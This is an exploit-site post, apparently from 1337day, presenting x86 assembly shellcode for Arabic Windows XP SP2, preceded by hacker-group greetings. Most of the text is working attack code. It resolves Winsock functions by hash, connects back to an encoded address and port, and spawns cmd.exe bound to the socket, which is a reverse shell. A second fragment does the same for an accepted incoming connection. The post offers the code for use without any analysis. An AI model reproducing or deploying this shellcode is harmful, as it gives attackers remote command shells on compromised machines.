|
-#-#-#-#-#-#-#-#
#~ Title : windows xp sp2 [ ARABIC] backconnect + acceptconnection shellcode =376 (bytes)
#~ Author : TrOoN
#~ E-mail : www.facebook.com/fysl.fyslm
#~ Home : city 617 logt Draria algeria |
#~ Web Site : www.1337day.com
#~ platform :windows xp arabic sp2 |
#~ Type : local root / exploit / shellcode / etc
# download link : www.microsoft.com
-#-#-#-#-#-#
[# ~~~~~~~~ <3 bem 2012 anchalah ~~~~~~ <3
[# ked ans | 1337day | pac_men | brisCo_dz | mosta_team |hacker_fire |elite_troJn | hacker_1420 |
[# TuRK hacke | security-ray| rapid7 | metasploit | backtrack| walid_rires| Dz_mafia|kh&mix |
[# HaMza mahmah ( evilscript) | security | blackhat | rusi_OVx | ubuntu team | karnel 32
[# kira_hacker
[# ~~~~~~ ALGERIAN SHELLCODE (ked ans | TrOoN :p ) | EXPLOIT(all) | HACKER(all) ~~~~~~~~#]
[+] sHellcode [+]
jmp startup_bnc
//:> karnel32 find_function
startup_bnc:
jmp startup
resolve_symbols_for_dll:
lodsd
push eax
push edx
call find_function
mov [edi], eax
add esp, 0x08
add edi, 0x04
cmp esi, ecx
jne resolve_symbols_for_dll
resolve_symbols_for_dll_finished:
ret
kernel32_symbol_hashes:
EMIT_4_LITTLE_ENDIAN(0x8e,0x4e,0x0e,0xec)
EMIT_4_LITTLE_ENDIAN(0x72,0xfe,0xb3,0x16)
EMIT_4_LITTLE_ENDIAN(0x7e,0xd8,0xe2,0x73)
ws2_32_symbol_hashes:
EMIT_4_LITTLE_ENDIAN(0xd9,0x09,0xf5,0xad)
EMIT_4_LITTLE_ENDIAN(0xec,0xf9,0xaa,0x60)
startup:
sub esp, 0x60
mov ebp, esp
jmp get_absolute_address_forward
get_absolute_address_middle:
jmp get_absolute_address_end
get_absolute_address_forward:
call get_absolute_address_middle
get_absolute_address_end:
pop esi
call find_kernel32
mov edx, eax
resolve_kernel32_symbols:
sub esi, 0x22
lea edi, [ebp + 0x04]
mov ecx, esi
add ecx, 0x0c
call resolve_symbols_for_dll
resolve_winsock_symbols:
add ecx, 0x08
xor eax, eax
mov ax, 0x3233
push eax
push 0x5f327377
mov ebx, esp
push ecx
push edx
push ebx
call [ebp + 0x04]
pop edx
pop ecx
mov edx, eax
call resolve_symbols_for_dll
initialize_cmd:
mov eax, 0x646d6301
sar eax, 0x08
push eax
mov [ebp + 0x30], esp
create_socket:
xor eax, eax
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
call [ebp + 0x10]
mov esi, eax
do_connect:
push 0x0101017f
mov eax, 0x5c110102
dec ah
push eax
mov ebx, esp
xor eax, eax
mov al, 0x10
push eax
push ebx
push esi
call [ebp + 0x14]
initialize_process:
xor ecx, ecx
mov cl, 0x54
sub esp, ecx
mov edi, esp
push edi
zero_structs:
xor eax, eax
rep stosb
pop edi
initialize_structs:
mov byte ptr [edi], 0x44
inc byte ptr [edi + 0x2d]
push edi
mov eax, esi
lea edi, [edi + 0x38]
stosd
stosd
stosd
pop edi
execute_process:
xor eax, eax
lea esi, [edi + 0x44]
push esi
push edi
push eax
push eax
push eax
inc eax
push eax
dec eax
push eax
push eax
push [ebp + 0x30]
push eax
call [ebp + 0x08]
exit_process:
call [ebp + 0x0c]
[+] accept connection shellcode [+]
push ebx
mov edx, esp
sub esp, ebx
mov ecx, esp
push edx
push ecx
push esi
call [ebp + 0x1c]
mov esi, eax
initialize_process:
xor ecx, ecx
mov cl, 0x54
sub esp, ecx
mov edi, esp
push edi
zero_structs:
xor eax, eax
rep stosb
pop edi
initialize_structs:
mov byte ptr [edi], 0x44
inc byte ptr [edi + 0x2d]
push edi
mov eax, esi
lea edi, [edi + 0x38]
stosd
stosd
stosd
pop edi
execute_process:
xor eax, eax
lea esi, [edi + 0x44]
push esi
push edi
push eax
push eax
push eax
inc eax
push eax
dec eax
push eax
push eax
push [ebp + 0x34]
push eax
call [ebp + 0x08]
exit_process:
|
推荐
评论(0条)
